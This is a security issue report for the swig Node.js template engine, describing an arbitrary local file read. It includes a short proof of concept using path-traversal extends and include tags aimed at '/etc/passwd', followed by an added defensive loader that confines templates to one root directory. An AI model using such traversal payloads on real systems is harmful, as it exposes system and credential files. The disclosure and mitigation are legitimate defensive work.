This repository has been archived by the owner on Feb 3, 2023. It is now read-only.

Security Issue: arbitrary local file read vulnerability during template rendering #88

Open
y1nglamore opened this issue Feb 1, 2023 · 0 comments

@y1nglamore

official doc:

poc:

1.html

```
{% extends '../../../../../etc/passwd' %}
{% include '../../../../../etc/passwd' %}
```

```js
// run.js
var swig = require('swig');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);
```

output:

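A containment check that rejects the `../` template names used in the PoC above, as an added example that is not part of the original issue or of swig's code. `makeConfinedLoader`, `isInside` and the template root are hypothetical names; the `resolve(to, from)` / `load(identifier, cb)` shape is assumed to match the custom loader interface swig documents, so verify it against the version in use.

```javascript
const fs = require('fs');
const path = require('path');

// True only when `candidate` is strictly below `root`. path.relative() is used
// instead of startsWith() so a sibling such as "<root>-old" is not accepted.
function isInside(root, candidate) {
  const rel = path.relative(root, candidate);
  return rel !== '' && rel.split(path.sep)[0] !== '..' && !path.isAbsolute(rel);
}

// templateRoot: the single directory trusted templates live in (hypothetical).
function makeConfinedLoader(templateRoot) {
  const root = path.resolve(templateRoot);
  return {
    // `to` is the name written in extends/include, `from` the referring file.
    resolve(to, from) {
      const base = from ? path.dirname(from) : root;
      const candidate = path.resolve(base, to);
      if (!isInside(root, candidate)) {
        throw new Error('template path outside root: ' + to);
      }
      return candidate;
    },
    // Re-check after resolving symlinks, so a link inside the root cannot
    // hand back a file that lives elsewhere.
    load(identifier, cb) {
      let text;
      try {
        const real = fs.realpathSync(identifier);
        if (!isInside(fs.realpathSync(root), real)) {
          throw new Error('template path outside root: ' + identifier);
        }
        text = fs.readFileSync(real, 'utf8');
      } catch (err) {
        if (cb) return cb(err);
        throw err;
      }
      return cb ? cb(null, text) : text;
    }
  };
}
```

Template names that come from user input still need an allow-list on top of this; the check only guarantees that whatever is resolved stays under the template root.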